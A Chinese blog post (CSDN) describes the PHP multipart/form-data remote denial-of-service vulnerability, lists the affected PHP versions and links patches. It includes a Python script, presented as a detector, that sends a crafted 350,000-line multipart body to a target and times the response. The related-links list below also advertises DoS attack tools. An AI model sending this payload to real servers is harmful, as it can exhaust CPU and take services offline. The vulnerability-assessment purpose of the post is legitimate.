浅谈“PHP multipart/form-data 远程DOS漏洞”

已于 2022-08-29 09:44:36 修改
阅读量707 收藏 1
点赞数 1
分类专栏: web安全 文章标签: php 开发语言
于 2022-08-29 09:43:06 首次发布
原文链接:https://blog.csdn.net/weixin_39934520/article/details/107895495
版权

一:漏洞名称:

PHP multipart/form-data 远程DOS漏洞

描述:

PHP 在处理HTTP请求中的multipart/form-data头部数据时存在一个安全漏洞,导致PHP大量重复分配和拷贝内存的操作,可能造成CPU资源占用100%并持续较长时间,这可能造成远程拒绝服务攻击。受影响的软件及系统:PHP 5.0.0 - 5.0.5;PHP 5.1.0 - 5.1.6;PHP 5.2.0 - 5.2.17;PHP 5.3.0 - 5.3.29;PHP 5.4.0 - 5.4.40;PHP 5.5.0 - 5.5.24;PHP 5.6.0 - 5.6.8

漏洞原理参考:https://www.secpulse.com/archives/32023.html

检测条件:

  1. Web业务运行正常。
  2. 网站采用了存在漏洞php中间件版本。

检测方法:

1.通过检测系统 ,进行检测。(暂无)

通过执行python脚本进行检测,相关代码参考如下:

'''
Author: Shusheng Liu,The Department of Security Cloud, Baidu
email: liusscs@163.com
'''
import sys
import urllib,urllib2
import datetime
from optparse import OptionParser

def http_proxy(proxy_url):

    proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
    null_proxy_handler = urllib2.ProxyHandler({})
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
#end http_proxy

def check_php_multipartform_dos(url,post_body,headers):
	req = urllib2.Request(url)
	for key in headers.keys():
		req.add_header(key,headers[key])
	starttime = datetime.datetime.now();
	fd = urllib2.urlopen(req,post_body)
	html = fd.read()
	endtime = datetime.datetime.now()
	usetime=(endtime - starttime).seconds
	if(usetime > 5):
		result = url+" is vulnerable";
	else:
		if(usetime > 3):
			result = "need to check normal respond time"
	return [result,usetime]
#end


def main():
    #http_proxy("http://127.0.0.1:8089")
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store",
                  dest="target",
                  default=False,
		  type="string",
                  help="test target")
    (options, args) = parser.parse_args()
    if(options.target):
	target = options.target
    else:
	return;

    Num=350000
    headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
            'Accept-Encoding':'gzip, deflate',
            'User-Agent':'Mozillal/5.0 (Windows NT 6.1; WOW64) AppleWebKiti/537.36 (KHTML, like Gecko) Chromeu/40.0.2214.111 Safariss/537.36'}
    body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
    payload=""
    for i in range(0,Num):
        payload = payload + "a\n"
    body = body + payload;
    body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
    print "starting...";
    respond=check_php_multipartform_dos(target,body,headers)
    print "Result : "
    print respond[0]
    print "Respond time : "+str(respond[1]) + " seconds";

if __name__=="__main__":
    main()

脚本检测效果如下:

漏洞修复:

PHP官方已经针对PHP 5.4 及PHP 5.5版本给出了补丁,请使用这些版本的用户,尽快到官方网站下载并安装补丁,补丁的下载地址如下:http://php.net/ChangeLog-5.php#5.4.41;http://php.net/ChangeLog-5.php#5.5.25,如果使用其他的版本,请持续关注官方补丁更新信息,其次,IT人员需要从业务稳定性、危害程度和范围及重要性等多个维度综合考虑,制定整改时间计划表,权重由高到低依次对局部网络及主机设备或某业务系统设备展开整改和加固工作(建议邀请漏洞相关厂商及安全厂商一同参与)。

其他补充说明:

在线环境复现练习:(并不是免费的)

https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECID9d6c0ca797abec2016040616113700001

 

 

zxl2605
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP multipartform-data 远程DOS漏洞
06-25
验证PHP multipartform-data 的远程DOS漏洞,适用于绿盟扫描器直接扫出来的漏洞验证
C#使用multipart/form-data示例
12-27
在IT行业中,网络通信是不可或缺的一部分,而上传文件或发送包含多个部分的数据通常涉及使用`multipart/form-data`编码方式。`multipart/form-data`是一种HTTP请求的Content-Type,它允许我们发送一个请求体,其中...
PHP multipart/form-data 远程DOS漏洞
FFy's Blog
06-13 3870
0x00 摘要 PHP解析multipart/form-datahttp请求的body part请求头时,重复拷贝字符串导致DOS。远程攻击者通过发送恶意构造的multipart/form-data请求,导致服务器CPU资源被耗尽,从而远程DOS服务器。 影响范围: PHP所有版本 0x01 漏洞入口 PHP源码中main/ rfc1867.c负责解析multipart/for
PHP5.3.29 multipart/form-data 远程DOS漏洞 修复方法
iiiiiiiiiiii9的专栏
01-19 2661
缘由PHP Multipartform-data远程DOS攻击漏洞,恶意构造的请求会导致服务器的cpu使用率达到100%。全版本受影响,危害严重。请尽快修复漏洞。受影响的软件及系统:PHP 5.0.0 – 5.0.5PHP 5.1.0 – 5.1.6PHP 5.2.0 – 5.2.17PHP 5.3.0 – 5.3.29PHP 5.4.0 – 5.4.40PHP 5.5.0 – 5.5.24PHP
析application/x-www-form-urlencoded和multipart/form-data的区别
10-25
在Web开发中,当涉及到通过HTTP协议向服务器发送POST请求时,我们经常需要选择不同的数据编码类型,主要是`application/x-www-form-urlencoded`和`multipart/form-data`。这两种编码方式各有其适用场景,主要取决于...
python处理multipart/form-data的请求方法
09-19
本文将详细介绍如何使用Python的requests库处理multipart/form-data类型的请求。 首先,multipart/form-data通常用于POST请求,特别是当需要提交二进制数据,如图片、文档等文件时。在HTTP请求中,它会将数据分割成...
用C语言编写multipart/form-data实现上传文件
02-26
本话题聚焦于使用C语言实现一个不依赖于curl等外部库的multipart/form-data文件上传功能。multipart/form-data是一种HTTP协议中用于处理多部分数据的格式,通常用于上传文件。 在C语言中实现这个功能需要理解HTTP...
PHPDOS, multipart/form-data 远程dos漏洞利用程序
08-01
该程序是 multipart/form-data 远程dos利用程序,一台电脑直接打崩一台服务器!程序只为便于检测你服务器漏洞,切勿非法使用。 检测效果不明显的话,多运行几个实例将会增强攻击力度。
phpbug69364-test:69364 PHP Multipartform-data远程dos漏洞
05-09
php-bug-69364-test CVE 2015-4024 , bug #69364 PHP Multipart/form-data remote dos Vulnerability WARNING: USE THIS TOOL AT YOUR OWN RISK 注意:此工具造成的任何后果由使用者自行承担 原理: 官方: 检测: Usage: python xxx.py -t "http://TARGET_URL" -x "THREAD" -r "REQUEST_LENGTH" Example: python xxx.py -t "" -x "100" -r "350000"
系列2:12、文件上传漏洞相关
qq_44704184的博客
04-13 735
文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务器端命令的能力。 危害:黑链、挖矿、文件泄露 一、文件上传漏洞利用流程 1、找到上传的位置 2、尝试绕过校验,上传文件 3、获得文件位置 4、蚁剑连接,管理文件 二、绕过总结 总结:删除/禁用JS、修改MIME、等价扩展名、大小写、htaccess、双写、空格、点、$DATA、%00截断、OxO0截断、图片马、条件竞争等等。 后续用到的相关知识点 一、MIME用法 客户端使用: 1、GET请求不需要这个字段。 2
PHP DOS漏洞的新利用:CVE-2015-4024 Reviewed
swordheart的博客
04-27 378
0x00 背景介绍 今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,中文版:/papers/?id=6077,英文版 :PHP :: Sec Bug #69364 :: PHP Multipart/form-data remote dos Vulnerability。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文
服务器安全扫描常见问题处理
weixin_30767835的博客
01-09 441
检测到目标主机可能存在 PHP multipart/form-data 远程DOS漏洞 解决办法:./upgrade_php.sh,升级到5.4.41 检测到会话cookie中缺少HttpOnly属性 解决办法:修改/usr/local/php/etc/php.ini,设置session.cookie_httponly = 1 点击劫持:X-Frame-Option...
PHP远程DoS漏洞深入分析及防护方案
weixin_30687587的博客
02-27 189
PHP远程DoS漏洞 4月3日,有人在PHP官网提交PHP 远程DoS漏洞PHP Multipart/form-data remote dos Vulnerability),代号69364。由于该漏洞涉及PHP的所有版本,故其影响面较大,一经发布迅速引发多方面关注。14日,各种PoC已经在网络上流传。此次漏洞具备如下特性: 一旦被利用成功,可以在迅速消耗被攻击主机的CPU资源,从而达...
文件上传漏洞
糖果不甜的博客
11-01 99
流程: 1.前端选择文件,进行提交 2.浏览器形成post Multipart报文发送到服务器 3.服务器中间件接收到报文 ,解析后交给相关后端代码进行处理 4.后端代码将上传的文件内容写入到临时文件中(PHP特有) 5.写入到文件中,文件名为提交的文件名或以一定规则生成的文件名 ...
文件上传漏洞学习
Goodric的博客
02-11 366
文件上传漏洞 文件上传的功能在web 应用系统很常见,很多网站都会会允许用户上传头像、附件、视频等。 然而向用户提供的功能越多,web 应用受到攻击的风险越大。 用户点击上传按钮后,后台会对上传的文件进行判断是否为指定的类型、后缀名、大小等等,然后将其按设计的格式重命名存储在指定的目录。 如果后台对上传的文件没有进行任何安全判断或判断条件不够严谨,攻击者就可能上传一些恶意文件。比如上传一句话木马。 原理 在web 应用程序中进行文件上传是通过将表单设为 multipart/form-date( 是http请
漏洞解决方案-文件上传
smart的博客
08-10 5628
漏洞解决方案-文件上传漏洞概述安全措施限制文件扩展名检查文件头格式文件内容检查随机命名文件非WEB目录存储代码参考 漏洞概述 非法的文件上传是黑客最常用的攻击手段之一,如果允许黑客向某个可通过 Web 访问的目录上传文件,并能够将这些文件传递给代码解释器,它会给正常的系统中执行恶意的代码文件(通常这种恶意代码叫做:WebShell),通过执行恶意的WebShell获取相应权限,来控制整个主机系统。 安全措施 限制文件扩展名 检查上传的文件扩展名是否为预期的扩展名文件,拒绝接收任何非预期的扩展名文件。 检查文
[Java代码审计]—文件上传漏洞
Sentiment的博客
11-05 3952
multipart/form-data这种编码方式的表单会以二进制流的方式来处理表单数据,这种编码方式会把文件域指定文件的内容也封装到请求参数里。可以与equlas对比来看,s1和s2只有大小写不同,如果用equals则返回false,equalsIgnoreCase返回true。上述都是no waf的文件上传方式,若不做任何防御的情况下,可以实现任意文件上传,造成文件上传漏洞。可以将图片存放到不可访问的路径,例如:Servlet的WEB-INF下,默认情况是访问不到的。通过上述任意方法,上传jsp马。
headers: { 'Content-Type': 'multipart/form-data' } 请详细解释multipart/form-data
最新发布
09-25
`multipart/form-data` 是一种用于在HTTP请求中传输二进制数据的编码方式。它通常用于上传文件或提交表单数据,特别是当表单中包含文件字段时。在这种编码方式下,请求体的数据被分割成多个部分,每个部分对应一个字段或一个文件。每个部分都有自己的头部信息,用于描述该部分的内容类型、名称和其他相关信息。这些部分使用一个分隔符来分隔,并以一个结束分隔符作为请求体的结束。 在你提供的示例中,`headers: {'Content-Type': 'multipart/form-data'}` 表示请求的内容类型是 `multipart/form-data`。这意味着该请求是以 `multipart/form-data` 方式来编码数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值